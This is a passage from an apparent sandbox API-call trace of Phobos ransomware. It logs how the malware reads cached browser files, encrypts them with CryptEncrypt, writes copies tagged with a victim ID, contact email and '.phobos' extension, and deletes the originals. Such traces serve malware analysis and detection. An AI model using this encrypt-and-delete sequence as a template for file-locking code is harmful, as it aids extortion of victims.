halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[3]")) returned 1 [0189.757] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0189.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[4]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[4]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0189.757] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=11689) returned 1 [0189.757] CloseHandle (hObject=0x194) returned 1 [0189.757] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[4]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[4]")) returned 0x2020 [0189.757] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[4].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[4].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.758] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[4]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[4]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0189.758] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0189.758] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0189.758] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[4].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[4].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0189.758] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0189.758] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0189.758] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2da9, lpOverlapped=0x0) returned 1 [0189.768] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2db0, dwBufLen=0x2db0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2db0) returned 1 [0189.768] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2db0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2db0, lpOverlapped=0x0) returned 1 [0189.769] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0189.769] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0189.770] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0189.770] CryptDestroyKey (hKey=0xa327e8) returned 1 [0189.770] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0189.770] CryptDestroyKey (hKey=0xa32a28) returned 1 [0189.770] CloseHandle (hObject=0x194) returned 1 [0189.770] CloseHandle (hObject=0x134) returned 1 [0189.770] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[4]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[4]")) returned 1 [0189.779] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0189.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\adfscript[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\adfscript[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0189.783] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=10352) returned 1 [0189.783] CloseHandle (hObject=0x134) returned 1 [0189.783] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\adfscript[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\adfscript[1]")) returned 0x2020 [0189.783] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\adfscript[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\adfscript[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.783] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\adfscript[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\adfscript[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0189.783] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0189.783] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0189.783] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\adfscript[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\adfscript[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0189.784] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0189.784] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0189.784] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2870, lpOverlapped=0x0) returned 1 [0189.808] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2880, dwBufLen=0x2880 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2880) returned 1 [0189.808] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2880, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2880, lpOverlapped=0x0) returned 1 [0189.809] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0189.809] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0189.809] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0189.809] CryptDestroyKey (hKey=0xa32c28) returned 1 [0189.809] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0189.809] CryptDestroyKey (hKey=0xa32a28) returned 1 [0189.809] CloseHandle (hObject=0x134) returned 1 [0189.809] CloseHandle (hObject=0x194) returned 1 [0189.809] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\adfscript[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\adfscript[1]")) returned 1 [0189.810] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0189.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\adfserve[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\adfserve[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0189.811] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3871) returned 1 [0189.811] CloseHandle (hObject=0x194) returned 1 [0189.811] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\adfserve[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\adfserve[1]")) returned 0x2020 [0189.811] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\adfserve[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\adfserve[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\adfserve[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\adfserve[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0189.812] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0189.812] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0189.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\adfserve[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\adfserve[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0189.812] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0189.813] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0189.813] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xf1f, lpOverlapped=0x0) returned 1 [0190.016] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf20, dwBufLen=0xf20 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf20) returned 1 [0190.016] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf20, lpOverlapped=0x0) returned 1 [0190.017] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32be8) returned 1 [0190.017] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.017] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0190.017] CryptDestroyKey (hKey=0xa32be8) returned 1 [0190.017] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0190.017] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.017] CloseHandle (hObject=0x194) returned 1 [0190.017] CloseHandle (hObject=0x134) returned 1 [0190.017] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\adfserve[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\adfserve[1]")) returned 1 [0190.018] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0190.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\async_usersync[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\async_usersync[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0190.019] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1347) returned 1 [0190.019] CloseHandle (hObject=0x134) returned 1 [0190.019] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\async_usersync[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\async_usersync[1]")) returned 0x2020 [0190.019] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\async_usersync[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\async_usersync[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\async_usersync[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\async_usersync[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0190.019] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.019] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\async_usersync[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\async_usersync[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.020] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0190.020] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.020] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x543, lpOverlapped=0x0) returned 1 [0190.387] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x550, dwBufLen=0x550 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x550) returned 1 [0190.387] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x550, lpOverlapped=0x0) returned 1 [0190.387] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0190.387] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.387] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0190.387] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0190.387] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0190.388] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.388] CloseHandle (hObject=0x134) returned 1 [0190.388] CloseHandle (hObject=0x194) returned 1 [0190.388] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\async_usersync[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\async_usersync[1]")) returned 1 [0190.400] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0190.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1D;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=5;target=_blank;aduho=600;grp=852361999[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1d;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=5;target=_blank;aduho=600;grp=852361999[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0190.400] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=4869) returned 1 [0190.400] CloseHandle (hObject=0xac) returned 1 [0190.401] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1D;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=5;target=_blank;aduho=600;grp=852361999[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1d;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=5;target=_blank;aduho=600;grp=852361999[1]")) returned 0x2020 [0190.401] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1D;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=5;target=_blank;aduho=600;grp=852361999[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1d;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=5;target=_blank;aduho=600;grp=852361999[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1D;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=5;target=_blank;aduho=600;grp=852361999[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1d;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=5;target=_blank;aduho=600;grp=852361999[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0190.401] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.401] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 